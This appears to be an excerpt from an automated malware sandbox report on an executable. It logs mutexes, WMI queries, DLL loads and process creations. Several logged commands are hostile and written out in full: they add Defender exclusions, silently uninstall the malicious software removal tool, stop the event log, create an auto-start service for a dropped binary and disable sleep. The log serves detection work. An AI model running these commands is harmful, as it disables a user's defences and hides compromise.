              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5012:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
              Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\qpwmktkikrnkqdxl
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6936:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tu1gyz51.jvf.ps1Jump to behavior
              Source: rtYpMDeKUq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rtYpMDeKUq.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeFile read: C:\Users\user\Desktop\rtYpMDeKUq.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\rtYpMDeKUq.exe "C:\Users\user\Desktop\rtYpMDeKUq.exe"
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "TASJBGYW"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "TASJBGYW"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
